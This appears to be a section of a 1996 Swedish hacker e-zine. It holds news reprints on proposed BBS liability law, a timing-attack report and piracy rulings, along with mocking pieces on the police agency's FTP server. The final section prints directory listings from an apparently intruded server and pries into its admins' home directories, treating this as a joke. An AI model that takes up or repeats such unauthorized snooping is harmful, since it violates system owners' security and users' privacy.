---------------------------------------------------------------------------
6.5 Datateknik, 960215 Slutet för de elektroniska klotterplanken
---------------------------------------------------------------------------
Den 30 augusti 1995 hölls i Rosenbad en hearing kring ett
lagutkast om BBSer (Bulletin Board Systems). Eller elektroniska
anslagstavlor som de kallas på svenska.
Bland de fyrtiotal inviterade fanns folk från myndigheter,
organisationer, universitet och näringsliv, med stark kantring
åt jurister. Också Telia, Postnet, Sunet, TT och olika regionala
nätverkssatningar var på plats. Samt en liten grupp närmast
sörjande. BBSare från det världsomspännande BBS-nätet Fidonet,
men också från de partipolitiska anslagstavlorna för (s) och (m),
plus några till.
Värd var enmansutredaren i IT-utredningen, Hans Jacobsson, till
vardags chef för bankstödsnämnden.
Vad var det då som Jacobsson satte i händerna på gästerna? Jo,
ett lagförslag som var rena dödsstöten för allt vad BBSer heter.
Enligt förslaget ska systemägaren, eller en av honom utsedd
systemoperatör, ha ansvaret för att BBSen inte innehåller något
brottsligt. Användare måste loggas och registreras för att vid
behov kunna spåras av polisen. Uppgifterna ska tillsammans med
det vederbörande lagt in i basen sparas under ett års tid.
Datainspektionen ska ha full frihet att när som helst
kontrollera databasen och efter eget gottfinnande stänga den.
Ägare och systemoperatör måste ha uppnått myndig ålder! Klart
att det blev protester.
De lagkloka upprördes lika mycket som nätadministratörer och
databasproducenter. Men i synnerhet förstås BBSarna själva.
-Det är helt ohållbart att lägga ansvaret på systemoperatören,
menar BBSaren Jonny Bergdahl som var med på hearingen för ett
halvår sedan.
-Ingen kommer att våga ha det jobbet. Bara genom min dator
passerar 1500 inlägg var dag. Man kan inte läsa allt!
-Och Datainspektionen får i förslaget större makt än polisen som
ju inte kan göra husrannsakan utan att ha allvarliga misstankar
om brott!
Men alldeles uselt var nog inte förslaget, försvarar sig IT-
utredningens sekreterare Per Furberg.
-Flera kom fram efteråt och tyckte det var bra. Varken Furberg
eller Jacobsson gör dock någon hemlighet av att majoriteten var
starkt negativ.
Några exempel: Omöjligt att spara allt ett helt år; omöjligt att
registrera och kolla upp alla som ringer in till databasen;
orimligt att lägga svåra straffrättsliga bedömningar på
systemoperatörerna.
Kanske, menar utredarna idag, var kritiken till stor del
självförvållad.
-Vi ville ha reaktioner så vi tog i ordentligt. Det var ett
provskott!
Leverans enligt order
Men med fyra timmars bandad kritik i bagaget var det bara för
utredarna att efter hearingen vända hem till lagskrivarverkstan
med svansen mellan benen.
Men ändå. Lydde inte utredarna bara order och effektuerade den
beställning de fått? När Bildtregeringen tillsatte IT-
utredningen sommaren 94 var det för att ta udden ur de
kriminella anslagstavlorna. De som gjort sig bemärkta som forum
för allehanda brottslig verksamhet; piratkopiering, främlings-
fientlig propaganda, eller som informationskälla för
narkotikatillverkning, virussspridning med mera.
Att BBSer också kan vara kanaler för åsiktsutbyte omnämndes
förvisso i utredningsdirektiven, men bara som en kollisionsrisk
mellan datalagens personregister och censurförbudet i etablerade
massmedier.
Det var tydligt att regeringen främst var ute efter en snabbt
hopkommen strafflag som kunde få slut på avarterna bland BBSerna.
Ett synsätt den delar med många regeringar dessa dagar. Senast
dokumenterat i en Europarådsrekommendation från september 95,
där medlemsländerna uppmanas utfärda lagar som lägger ansvaret
på systemoperatörerna. Och den svenske delegaten i arbetsgruppen
bakom rekommendationen hette förstås: Per Furberg! BBS-
kriminalitetens verkliga omfattning är det ingen som känner.
Enligt RPS sysslar minst 1000 av de 4000-6000 BBSerna i landet
regelmässigt med brott.
Men är de verkligen så oåtkomliga med gällande lagar? Både ja
och nej.
En värmländsk BBS-ägare i Karlstad blev för en tid sedan
bötfälld för att han tillåtit barnpornografiska bilder i sin
databas. Han hade inte själv gjort något för att underlätta
trafiken, men han kände till den. Domen överklagades men togs
aldrig upp av hovrätten.
Ett annat omdebatterat fall är helsingborgaren som åtalats för
att ha upplåtit sin BBS för spridning av piratkopior. Målet
avgörs i dagarna av Högsta Domstolen, men tills dess gäller den
friande domen från hovrätten.
Denna osäkerhet om lagstiftningens räckvidd är motivet till en
särskild BBS-lag. I det preliminära förslaget passar utredarna
också på att göra bland annat barnpornografi och rasistiska
uttalanden åtalbara redan när de når fram till en BBS, vilket de
inte är idag.
Förslaget har blivit en blandning av den tryckfrihetsrättsliga
modellen och vanlig strafflag. Enligt TF svarar en ansvarig
utgivare ensam för brott som begås genom tryckt skrift. Enligt
BBS-lagen ansvarar alla! Inte bara systemoperatören får ta
smällen, utan även författare och andra bidragsgivare, för
kränkande uttalanden, rasism, olagliga bilder och piratkopior.
Fastän uppenbarligen inspirerad av ansvarssystemet i TF och
Yttrandefrihetslagen (YGL) drämmer IT-utredningen till med
dubbelt straffansvar. Ja, mångdubbelt om man betänker att i nät
som Fidonet samma information studsar åtskilliga gånger mellan
ett stort antal BBSer.
Alternativ finns
Även diskussionsgrupper (newsgroups), och chats på Internet
träffas av bannbullan. Tusentals sådana möten mellanlandar
dagligen på svenska universitets- och företagsdatorer. Blir BBS-
förslaget lag kommer Sveriges systemoperatörer aldrig mer att
våga gå och lägga sig om nätterna. De måste hela tiden kila upp
och kolla hårddisken! I Australien har man skissat en modell med
stegvis upptrappade sanktioner för dem som sprider sex och våld
på nätet. Men tills vidare har man stannat för den lägsta
ingreppsnivån, självsanering bland nätadministratörerna. Under
tiden ska det faktiska behovet av en lagrevision kartläggas
ordentligt. I USA laborerar domstolarna redan med utgivaransvar
i vissa situationer. Databasägare som bara upplåter plats på
skivminnen eller skickar materialet vidare obearbetat
(distributors) slipper ansvar. De som försöker städa och hålla
rent riskerar däremot att åka dit (publisher), vilket den
välkända jätte-BBSen Prodigy fick erfara när den dömdes som
ansvarig publisher för ärekränkande inlägg från en deltagare i
den öppna, mycket populära, diskussionsgruppen Money Talks.
Det senaste i USA är den nyligen antagna, Decency Act som är en
del i den federala telelagen. Där bannlyses alla slags obsceniteter
i ord och bild på nätet. Framförallt det som riktar sig mot
ungdomar under 18 år. Databasägare som medvetet tillåter sådan
trafik straffas med dryga böter eller upp till 2 års fängelse.
De kan slippa ansvar om de på godtagbart sätt försökt
hindra åtkomst för ungdomar.
Ett alternativ som IT-utredningen fått att fundera över kommer
från juristen vid Stockholms universitet Martin Brinnen. Han
skriver en doktorsavhandling om telemedier och menar att
utredningens förslag är onödigt detaljerat.
Brinnen anser att man kan lägga ett generellt ansvar på alla
tele-och nätoperatörer för det som går genom deras nät. Den som
vill kan glida ur snaran genom att ha ett loggningssystem som
avslöjar avsändarna.
Enligt Brinnen skulle det räcka med ett litet ingrepp i
telelagen, och man skulle slippa irriterande regler om censur,
arkivering och tillsyn.
Senast den 31 mars i år ska IT-utredningens slutförslag ligga
hos regeringen. Från början gällde 1 november-95 som deadline,
men efter debaclet vid hearingen begärde man extra tid.
Utredningen har också ett uppdrag om elektroniska dokument så
BBS-förslaget har legat i träda sedan augusti.
-Men nu ska vi ta itu med den, säger Hans Jacobsson.
Tänkte för smått
Frågan är vilken roll kritiken får spela?
-Jag vet inte. Men det är klart, när vi skissade vårt förslag
hade jag en liten småskalig BBS i Nyköpingstrakten i tankarna.
Nu har jag förstått att lagen drabbar många fler.
-Som någon sa: rätt vad det är dimper det ned 40 Megabyte news
från USA.
-Arkivering i ett år under sådana omständigheter är att begära
för mycket.
Även annat måste nog omprövas menar Jacobsson. Sådant som
möjligheterna att kontrollera innehållet och Datainspektionens
roll.
-Men den som vet vad han har i databasen bör kunna ta ett ansvar.
BBS-lagen skulle ha trätt i kraft till sommaren om det
ursprungliga schemat följts. Nu blir det tidigast till årskiftet.
Nu står åtminstone tre olika kockar och rör i BBS-soppan.
Förutom Jacobssons utredning, är det utredningen om Nya Medier
och en nytillsatt Datalagsutredning. Men alla är i otakt och har
inte kunnat prata ihop sig.
Ett tänkbart scenario är att det kollektiva ansvar som IT-
utredningen arbetar med kolliderar med ett enmansansvar av TFs
modell, vilket utredningen om Nya medier kan tänkas föreslå. Och
Datalagsutredningen kan snubbla på EUs persondatadirektiv vars
normer för skydd av personuppgifter BBSer knappast lever upp
till.
Det kan bli en svår huvudvärk för regeringen. En ny lag får
kanske snabbt bukt med problemen, men löper å andra sidan risk
att behöva ändras radikalt redan efter något år.
---------------------------------------------------------------------------
6.6 Datateknik, 960215 Netscapes kryptering bruten på nytt-med gammal metod
---------------------------------------------------------------------------
Dagens krypteringsalgoritmer är inte så säkra som experterna
vill låta göra gällande. De kan inte knäckas med matematiska
eller kryptotekniska tillvägagångssätt. Däremot kan de vara
mycket sårbara mot okonventionella metoder.
Paul Kocher, biologistuderande och inte alls någon
säkerhetseller kryptoexpert, lyckades hitta en allvarlig svaghet
i dagens krypteringssystem med öppna nycklar. Han visade att
tiden det tar för att koda och avkoda meddelanden kan avslöja
information om viktiga delar i krypteringsalgoritmerna.
Många krypteringsprogram arbetar med öppna nycklar. Den öppna
nyckeln är känd, medan varje användare har en egen privat.
Nycklarna är vanligen mycket stora primtal. Vissa
krypteringsprogram, som det i Netscape, använder den privata
nyckeln som en exponent. Det höjer den privata nyckeln och ett
annat primtal till potensen av den privata nyckeln, alltså
nyckeln upphöjt till sig självt.
Paul Kocher upptäckte att han fick ledtrådar till utformningen
av den privata nyckeln efter hur lång tid meddelanden av olika
längd tar att koda och avkoda. En miljard kombinationer kan vara
omöjligt för en hacker att forcera, men om man genom Kochers
teknik kan minska antalet möjliga fall till en miljon är
krypteringen inte längre säker. Problemet med de olika
beräkningstiderna har länge varit känt inom forskningen på
kryptering, men kryptoexperter är matematiker och inga
säkerhetsexperter, och kunskapen har inte trängt ut.
---------------------------------------------------------------------------
6.7 Datateknik, 960215 Storebror fumlar med lagböckerna
---------------------------------------------------------------------------
En statlig utredning föreslår att den som driver en BBS måste
vara minst 18 år och att han ska vara ansvarig för att basen
inte innehåller något brottsligt. Han ska logga användarna så
att de kan spåras av polisen och han ska spara allt som skickas
in under ett år. Det är förstås ett orimligt förslag som, om det
genomförs, raderar ut hela BBS-kulturen. Och därmed en hobby som
sannolikt lockat många ungdomar att bli datatekniker. Här måste
lagstiftarna hitta bättre lösningar.
Christer Åkerman visar på sidorna 22-25 i detta nummer av
Datateknik på de problem som uppsåtr om lagen antas. I USA har
presidenten just skrivit på en ny telekommunikationslag. I lagen
ingår en del som kallas Decency Act och som innebär att
obsceniteter i ord och bild bannlyses på nätet. Framförallt vill
man stoppa det som riktar sig till ungdomar under 18 år. Porr
får endast spridas om man försäkrat sig om att mottagaren är
vuxen och att denne verkligen vill se materialet.
Förslaget har fått många WWW-publicister att protestera genom
att lägga en sorgsvart bakgrund på sina sidor. Denna amerikanska
strid står, förenklat, mellan en tryckfrihetsfundamentalistisk
falang och den inflytelserika kristna högern. Mer om detta på
våra nyhetssidor.
Lägg så till dessa båda aktuella händelser debatten kring
krypteringen. Åtskilliga av världens stater vill förhindra allt
för kraftfull kryptering. Världens storebröder vill istället att
vi ska använda kryptering med inbyggda lönndörrar för polisen.
USA har förbjudit export av krypton med alltför långa nycklar.
Vad vi ser är en match mellan tekniken (och individuella
tekniker) och staterna. Det är svårt att tro att inte staterna
till slut tar hem spelet. Men det är också svårt att se hur de
ska lyckas med det när teknikerna tagit fram en så
decentraliserade nätlösning som Internet.
---------------------------------------------------------------------------
6.8 TT, 960222 HD lät datakopierare behålla utrustning
---------------------------------------------------------------------------
Högsta domstolen mildrade hovrättens dom och låter en 22-årig
Stockholmare behålla merparten av sin datorutrustning. I
hovrätten dömdes mannen för upphovsrättsintrång. Två datorer och
sex hårddiskar ansågs vara förverkade.
HD låter 22-åringen behålla allt utom en hårddisk som rätten
anser innehålla upphovsrättsligt skyddat material som spritts
via en elektronisk brevlåda, Bulletin Board System (BBS). 22-
åringen har i sitt hem haft en databas med mycket stor
kapacitet. I databasen har han haft minst 1 000 program som
varit upphovsrättsligt skyddade.
Under 1992 och 1993 gjorde mannen programmen tillgängliga för
omkring 300 användare genom sin BBS. I databasen förekom också
byten och kopieringar av olika program mellan användarna. I HD:s
dom påpekar man att förverkande enligt upphovsrättslagen endast
kan bli aktuell om man tror att material ska användas för
brottslig verksamhet.
HD anser att det bara är en av hårddiskarna som innehåller det
upphovsrättsskyddade material som 22-åringen spritt i sin BBS.
Därför får han nu tillbaka det andra materialet.
---------------------------------------------------------------------------
6.9 Computer Sweden, 960227 Lucka i lagen skyddar piratkopior
---------------------------------------------------------------------------
Det är inte olagligt att ha en BBS där vem som helst kan hämta
hem piratkopierade program.
Högsta domstolen friade i torsdags en man som drev en sådan BBS,
eftersom han inte själv aktivt medverkat till spridningen.
Medverkandeansvaret togs aldrig upp när en man från Helsingborg
stod åtalad i högsta domstolen för brott mot upphovsrättslagen.
Mannen drev i början av 90-talet en BBS, en elektronisk
anslagstavla, där piratkopierade program fanns tillgängliga för
vem som helst att hämta.
-Domen är bekymrande för mjukvaruindustrin. Som domen är
formulerad säger den att man i princip aldrig kan utkräva ansvar
av en systemoperatör, säger advokat Agne Lindberg som är
juridiskt ombud för leverantörsorganisationen Business Software
Alliance.
-BSA kommer att verka för en lagförändring. Det borde gå att
kräva ansvar av den som köper modem och lägger upp en databas.
HD konstaterar i sin dom att det finns en påtaglig lucka i det
upphovsrättsliga skyddet för program, men domstolen ansåg att
man måste döma enligt lagens bokstav, och då ska mannen frias.
-Hovrätten kunde inte bevisa att programmen faktiskt hade
kopierats. Dessutom krävs bevis för att mannen var medveten om
kopieringen. Därför kunde HD inte ta upp frågan, säger Nils
Rekke, byråchef hos Riksåklagaren.
Mannen fälldes i tingsrätten men friades i hovrätten. Nu har han
alltså friats även av högsta domstolen.
[ Se http://www.dsv.su.se/~jpalme/BBS-domen-HD-96-02-22.html för
det fullständiga domslutet ]
__ _ _ ___ ___
___ ( _| U | ) = __________________________________________________________
7.0 ___)___)_)_\_| av htXs
Den hetaste URL:en just nu måste vara www.takedown.com, i alla fall om man
får räkna imponansvärdet i "Kevin-on-Demand". Vi rekommenderar ett omedelbart
besök.
Om du inte skulle ha tillgång till en grafisk browser, gå rakt på höjdpunkten
och telnet:a till kevin-on-demand.takedown.com på någon port mellan 4001 och
4028. Den vedertagna uppfattningen är nog att 4010 är absolut bäst.
Du behöver inte göra något aktivt för att njuta av föreställningen, men du kan
använda följande knappar för att styra hastigheten:
0-9 Move at a rate of 0-9. (0 is stopped.)
> Move forward.
If already moving forward, increase speed.
< Move in reverse.
If already in reverse, increase speed.
} Single-step forward.
{ Single-step backward.
+ Increase speed by 0.5.
- Decrease speed by 0.5.
f,p Move forward. Reset speed to 1.
F,P Move forward. Reset speed to 10.
r Move in reverse. Reset speed to 1.
R Move in reverse. Reset speed to 10.
s Slow, then slower.
/ Skip.
<space> Pause.
q Exit.
__ __ __ ___ ___
___ | V | ( _| __) _______________________________________________________
8.0 |__v__|__|___)___)
Rikspolisstyrelsen på Internet
av
Broken Pipe
[NWS - Niggaz With Sniffers]
Det verkar inte sämre än att snuten ämnar göra sin närvaro på Internet känd
genom att fortsätta sitt arbete med att sprida harmoni, glädje och människo-
kärlek även i digital form.
domain: police.se
org: Rikspolisstyrelsen
admin-c: Patric Ostman
address: Box 12256, S-102 26 Stockholm
phone: +46 8-4019540
fax-no: +46 8-6507787
Domänen består av ett litet nät med ett par PCs och i alla fall en HP-box.
Vad RPS internetssatsning kommer att innebära, och hur långt de kommit är
svårt att säga. De har en www-sida som består av meddelandet "under
uppbyggnad", och deras mail-server har följande att säga om livet:
220 mail.police.se ESMTP server (post.office v1.9.1 **** trial license expired ****) ready
Dock verkar den fortfarande vara funktionsduligt. Vi får verkligen hoppas att
inte RPS *olagligt* nyttjar en licens som gått ut!
Det enda som man kan vara helt säker på är att den anonyma ftp-servern på
ftp.police.se inte är subventionerad av ledningen inom Rikspolisstyrelsen.
Eller är detta ett helt nytt grepp för att öka polisens populäritet?
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 13232
drwxr-xr-x 3 root root 3072 Jul 31 1995 .
drwxrwxr-x 3 root wheel 1024 Jul 31 1995 ..
-rw-r--r-- 1 root root 15395 Jul 31 1995 00INDEX
-rw-r--r-- 1 root root 126176 Jul 31 1995 GiaGary.gif
-rw-r--r-- 1 root root 56419 Jul 31 1995 LiLi.jpg
-rw-r--r-- 1 root root 25857 Jul 31 1995 NEWinona17.jpg
-rw-r--r-- 1 root root 1840 Jul 31 1995 README.uploads
-rw-r--r-- 1 root root 37391 Jul 31 1995 W_Ryder.jpg
-rw-r--r-- 1 root root 104200 Jul 31 1995 WinRyder08.jpg
-rw-r--r-- 1 root root 120206 Jul 31 1995 WinRyder09.jpg
-rw-r--r-- 1 root root 8846 Jul 31 1995 WinonaAgeInn1.jpg
-rw-r--r-- 1 root root 13716 Jul 31 1995 WinonaAgeInn2.jpg
-rw-r--r-- 1 root root 27053 Jul 31 1995 WinonaAgeInn3.jpg
-rw-r--r-- 1 root root 36359 Jul 31 1995 WinonaAndJohnny.jpg
-rw-r--r-- 1 root root 39715 Jul 31 1995 WinonaBeach.jpg
-rw-r--r-- 1 root root 141603 Jul 31 1995 WinonaBed.jpg
-rw-r--r-- 1 root root 11776 Jul 31 1995 WinonaBigHair.jpg
-rw-r--r-- 1 root root 55552 Jul 31 1995 brooke.gif
-rw-r--r-- 1 root root 34144 Jul 31 1995 chlock.gif
-rw-r--r-- 1 root root 490090 Jul 31 1995 death_drop.gif
-rw-r--r-- 1 root root 178693 Jul 31 1995 dick_button1.gif
-rw-r--r-- 1 root root 492033 Jul 31 1995 doubleAxel2.gif
-rw-r--r-- 1 root root 101999 Jul 31 1995 elaine_zayak1.gif
-rw-r--r-- 1 root root 76037 Jul 31 1995 elana1.jpg
-rw-r--r-- 1 root root 413766 Jul 31 1995 flip.gif
-rw-r--r-- 1 root root 26064 Jul 31 1995 impressionist.gif
-rw-r--r-- 1 root root 61489 Jul 31 1995 janet.jpg
-rw-r--r-- 1 root root 245397 Jul 31 1995 karen_bryden.jpg
-rw-r--r-- 1 root root 29130 Jul 31 1995 katerina_witt1.jpg
-rw-r--r-- 1 root root 81503 Jul 31 1995 katerina_witt2.gif
-rw-r--r-- 1 root root 129860 Jul 31 1995 katerina_witt3.jpg
-rw-r--r-- 1 root root 184112 Jul 31 1995 katerina_witt4.gif
-rw-r--r-- 1 root root 90131 Jul 31 1995 katerina_witt5.gif
-rw-r--r-- 1 root root 74982 Jul 31 1995 katerina_witt6.gif
-rw-r--r-- 1 root root 307617 Jul 31 1995 kerrig2a.gif
-rw-r--r-- 1 root root 276742 Jul 31 1995 kerrig3a.gif
-rw-r--r-- 1 root root 204805 Jul 31 1995 kerrig4a.gif
-rw-r--r-- 1 root root 341938 Jul 31 1995 kerrig5a.gif
-rw-r--r-- 1 root root 335129 Jul 31 1995 kerrig6a.gif
-rw-r--r-- 1 root root 127534 Jul 31 1995 kimbass2.gif
-rw-r--r-- 1 root root 43747 Jul 31 1995 kimbass5.jpg
-rw-r--r-- 1 root root 45025 Jul 31 1995 kristi_yamaguchi1.gif
-rw-r--r-- 1 root root 95620 Jul 31 1995 kristi_yamaguchi2.jpg
-rw-r--r-- 1 root root 18101 Jul 31 1995 kristi_yamaguchi3.jpg
-rw-r--r-- 1 root root 21514 Jul 31 1995 kristi_yamaguchi4.jpg
-rw-r--r-- 1 root root 185324 Jul 31 1995 lisa_ervin1.gif
-rw-r--r-- 1 root root 392736 Jul 31 1995 loop.gif
-rw-r--r-- 1 root root 47811 Jul 31 1995 lu_chen1.jpg
-rw-r--r-- 1 root root 385173 Jul 31 1995 lutz.gif
-rw-r--r-- 1 root root 70669 Jul 31 1995 mariah1.jpg
-rw-r--r-- 1 root root 185063 Jul 31 1995 michelle_kwan1.gif
-rw-r--r-- 1 root root 181683 Jul 31 1995 michelle_kwan2.gif
-rw-r--r-- 1 root root 56616 Jul 31 1995 midori_ito1.gif
-rw-r--r-- 1 root root 36392 Jul 31 1995 midori_ito2.jpg
-rw-r--r-- 1 root root 68899 Jul 31 1995 nancy_kerrigan1.gif
-rw-r--r-- 1 root root 100710 Jul 31 1995 nancy_kerrigan2.gif
-rw-r--r-- 1 root root 29968 Jul 31 1995 nancy_kerrigan3.jpg
-rw-r--r-- 1 root root 30609 Jul 31 1995 nb_camp1.gif
-rw-r--r-- 1 root root 164823 Jul 31 1995 nicole_bobek1.gif
-rw-r--r-- 1 root root 39173 Jul 31 1995 nk_camp1.gif
-rw-r--r-- 1 root root 69377 Jul 31 1995 ob_camp1.gif
-rw-r--r-- 1 root root 48874 Jul 31 1995 ob_camp2.gif
-rw-r--r-- 1 root root 62745 Jul 31 1995 ob_camp3.gif
-rw-r--r-- 1 root root 64580 Jul 31 1995 ob_camp4.gif
-rw-r--r-- 1 root root 50959 Jul 31 1995 ob_camp5.gif
-rw-r--r-- 1 root root 59502 Jul 31 1995 ob_camp6.gif
-rw-r--r-- 1 root root 39870 Jul 31 1995 ob_camp7.gif
-rw-r--r-- 1 root root 38377 Jul 31 1995 ob_camp8.gif
-rw-r--r-- 1 root root 228147 Jul 31 1995 oksana_bayul1.gif
-rw-r--r-- 1 root root 169752 Jul 31 1995 oksana_bayul2.gif
-rw-r--r-- 1 root root 123132 Jul 31 1995 oksna-17.jpg
-rw-r--r-- 1 root root 112161 Jul 31 1995 oksna-au.gif
-rw-r--r-- 1 root root 161280 Jul 31 1995 oksna-lm.jpg
-rw-r--r-- 1 root root 76255 Jul 31 1995 oksna-oi.jpg
-rw-r--r-- 1 root root 62121 Jul 31 1995 oksna-st.jpg
-rw-r--r-- 1 root root 81408 Jul 31 1995 pa-hwf1.jpg
-rw-r--r-- 1 root root 58387 Jul 31 1995 pa-mar92.jpg
-rw-r--r-- 1 root root 64982 Jul 31 1995 pa-nov93.jpg
-rw-r--r-- 1 root root 102037 Jul 31 1995 pa-pca1.jpg
-rw-r--r-- 1 root root 84502 Jul 31 1995 pa-pca2.jpg
-rw-r--r-- 1 root root 71168 Jul 31 1995 pa-port1.jpg
-rw-r--r-- 1 root root 87936 Jul 31 1995 pa-soaks.jpg
-rw-r--r-- 1 root root 68096 Jul 31 1995 pa-suita.jpg
-rw-r--r-- 1 root root 677512 Jul 31 1995 pamelada.gif
-rw-r--r-- 1 root root 18154 Jul 31 1995 pamiller.jpg
-rw-r--r-- 1 root root 160431 Jul 31 1995 pfeifer1.jpg
-rw-r--r-- 1 root root 54526 Jul 31 1995 pfeiffe3.jpg
drwxr-xr-x 2 root root 1024 Jul 31 1995 playmate
-rw-r--r-- 1 root root 248807 Jul 31 1995 poster.gif
-rw-r--r-- 1 root root 128122 Jul 31 1995 pvkergn3.gif
-rw-r--r-- 1 root root 88333 Jul 31 1995 pvkergn5.gif
-rw-r--r-- 1 root root 252220 Jul 31 1995 pvoksna1.gif
-rw-r--r-- 1 root root 299976 Jul 31 1995 pvsktmdl.gif
-rw-r--r-- 1 root root 1840 Jul 31 1995 readme.upl
-rw-r--r-- 1 root root 48329 Jul 31 1995 sandra.gif
-rw-r--r-- 1 root root 98223 Jul 31 1995 sandra_b.jpg
-rw-r--r-- 1 root root 533573 Jul 31 1995 sit.gif
-rw-r--r-- 1 root root 771 Jul 31 1995 skate_cat.gif
-rw-r--r-- 1 root root 9110 Jul 31 1995 spiral1.gif
-rw-r--r-- 1 root root 94769 Jul 31 1995 surya_bonaly1.gif
-rw-r--r-- 1 root root 26064 Jul 31 1995 surya_bonaly2.gif
-rw-r--r-- 1 root root 258337 Jul 31 1995 tanja_szewczenko.gif
-rw-r--r-- 1 root root 180200 Jul 31 1995 tanja_szewczenko2.gif
-rw-r--r-- 1 root root 101327 Jul 31 1995 tanja_szewczenko3.gif
-rw-r--r-- 1 root root 384265 Jul 31 1995 tloop.gif
-rw-r--r-- 1 root root 146359 Jul 31 1995 tonya_harding1.gif
-rw-r--r-- 1 root root 17428 Jul 31 1995 topthree.jpg
-rw-r--r-- 1 root root 221906 Jul 31 1995 zam.jpg
226 Transfer complete.
7618 bytes received in 1.3 seconds (5.6 Kbytes/s)
ftp> cd playmate
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 332
drwxr-xr-x 2 root root 1024 Jul 31 1995 .
drwxr-xr-x 3 root root 3072 Jul 31 1995 ..
-rw-r--r-- 1 root root 64712 Jul 31 1995 playmate-apr95.jpg
-rw-r--r-- 1 root root 18204 Jul 31 1995 playmate-aug95-b.jpeg
-rw-r--r-- 1 root root 27497 Jul 31 1995 playmate-dec94.jpg
-rw-r--r-- 1 root root 48368 Jul 31 1995 playmate-feb95.jpg
-rw-r--r-- 1 root root 26496 Jul 31 1995 playmate-jan95.jpg
-rw-r--r-- 1 root root 63759 Jul 31 1995 playmate-jun95-b.jpg
-rw-r--r-- 1 root root 23042 Jul 31 1995 playmate-mar95.jpg
-rw-r--r-- 1 root root 51941 Jul 31 1995 playmate-may95.jpg
226 Transfer complete.
733 bytes received in 0.097 seconds (7.4 Kbytes/s)
ftp>
_______________________________________________________________________________
8.2
En sysadmins samvete
av CB
[ Följande artikel fick vi via mail från ett konto som bergis inte
tillhör avsändaren. Texten var signerad CB, så det är namnet som vi
sätter ut som artikelförfattare. Tyvärr kände vi att det vore alltför
grymt att hänga ut vissa personer som omnämndes, därför är delar av
texten raderad, och vissa namn och adresser är borttagna. Vi har
givetvis inte haft möjlighet att kontrollera någon av uppgifterna. ]
Tur ar val att det finns sys admins. Hur skulle det annars se ut? Med en
massa users som hackar, tradar w4r3z, och beter sig allmant illa at..
Tja, det kan vara ngt att tanka pa.. Men forst sa kan ni kolla pa hur
olika sysadmin's bar sig at.. Hehe..
Till exempel pa -----.---.fi.. Kanske mera kant som ------- --------- --
----------.
Ett utdrag ur en ls -laR / ..
total 312
drwxr-xr-x 20 root root 1024 Jan 10 11:37 .
drwxr-xr-x 20 root root 1024 Jan 10 11:37 ..
drwxr-xr-x 10 webadmin webadmin 1024 Jan 11 17:25 WWW
drwxr-xr-x 2 root bin 2048 Jan 10 10:25 bin
drwxr-xr-x 2 root root 1024 Aug 28 00:36 boot
drwxr-xr-x 2 root root 4096 Jan 10 10:28 dev
drwxr-xr-x 9 root root 3072 Jan 12 13:09 etc
drwxrwxr-x 72 root root 2048 Jan 11 17:27 home
drwxr-xr-x 3 root root 1024 Aug 17 00:09 lib
drwxr-sr-x 6 list list 1024 Oct 26 23:19 list
drwxr-xr-x 2 root root 12288 Jul 10 1995 lost+found
drwxr-xr-x 2 root root 1024 Mar 16 1994 mnt
drwxrwxr-x 4 root root 1024 Nov 26 20:27 private
drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 private2
^^^^^^^^
Hmm, bara att det finns en group som heter TheDudez tyder ju pa att
sysadm verkar vara lite "oserios"..
dr-xr-xr-x 7 root root 0 Jan 10 12:28 proc
drwx------ 14 root root 2048 Jan 12 11:14 root
drwxr-xr-x 2 root bin 2048 Aug 28 01:06 sbin
drwxrwxrwt 5 root root 5120 Jan 12 19:00 tmp
drwxr-xr-x 20 root root 1024 Aug 22 16:55 usr
drwxr-xr-x 18 root root 1024 Jul 28 14:02 var
-r-------- 1 root root 273412 Sep 14 10:46 vmlinuz
Tja, ska vi borja med att kolla vad som finns i /private da..
/private:
total 6
drwxr-xr-x 4 root root 1024 Nov 26 20:27 .
drwxr-xr-x 20 root root 1024 Jan 10 11:37 ..
drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 candyman
drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 pone
Tva stycken, enligt vad jag kan forsta sysadmins.. Eftersom de har egna
group's och ligger i /private som ar agd av root.. For att inte namna att
filer i deras hem-dir ar root-agda da.. Ska bli kul att se vad de har for
roligt..
/private/candyman:
total 711
drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 .
drwxrwxr-x 4 root root 1024 Nov 26 20:27 ..
-rw-r--r-- 1 candyman nighteam 0 Jul 11 1995 .addressbook
-rw-r--r-- 1 candyman nighteam 1257 Jul 11 1995 .addressbook.lu
-rw-r--r-- 1 candyman nighteam 451 Jan 12 13:19 .cshrc
-rw-r--r-- 1 candyman nighteam 481 Jan 10 12:35 .cshrc~
-rw-r--r-- 1 candyman nighteam 122 Jan 10 12:41 .emacs
-rw-r--r-- 1 candyman nighteam 24004 Aug 18 13:25 .fvwmrc
-rw-r--r-- 1 candyman nighteam 24002 Aug 18 12:49 .fvwmrc~
-rw-r--r-- 1 candyman nighteam 164 Jul 10 1995 .kermrc
-rw-r--r-- 1 candyman nighteam 34 Jun 6 1993 .less
-rw-r--r-- 1 candyman nighteam 114 Nov 24 1993 .lessrc
-rw-r--r-- 1 candyman nighteam 1 Dec 5 11:24 .login
-rw-r--r-- 1 candyman nighteam 25 Dec 1 10:41 .login~
-rw-r--r-- 1 candyman nighteam 0 Nov 6 16:07 .mc.ini
-rw-r--r-- 1 candyman nighteam 503 Nov 6 16:07 .mc.tree
drwx------ 2 candyman nighteam 1024 Jan 12 12:51 .ncftp
-rw------- 1 candyman nighteam 118 Dec 12 12:18 .ncrecent
drwx------ 3 candyman nighteam 1024 Dec 20 15:44 .netscape
-rw-r--r-- 1 candyman nighteam 2625 Jan 12 14:32 .netscape-bookmarks.html
drwx------ 2 candyman nighteam 24576 Jan 12 18:47 .netscape-cache
-rw------- 1 candyman nighteam 17401 Jul 25 13:18 .netscape-history
-rw-r--r-- 1 candyman nighteam 148361 Jul 24 10:53 .netscape-newsgroups-news
-rw-r--r-- 1 candyman nighteam 1686 Jan 12 14:30 .netscape-preferences
-rw------- 1 candyman nighteam 0 Jan 10 12:33 .news_time
-rw-r--r-- 1 candyman nighteam 13714 Jan 12 13:32 .newsrc
-rw-r--r-- 1 candyman nighteam 258392 Nov 20 14:59 .newsrc.8728
drwx------ 2 candyman nighteam 1024 Sep 4 20:38 .nn
-rw-r--r-- 1 candyman nighteam 13709 Jan 12 13:21 .oldnewsrc
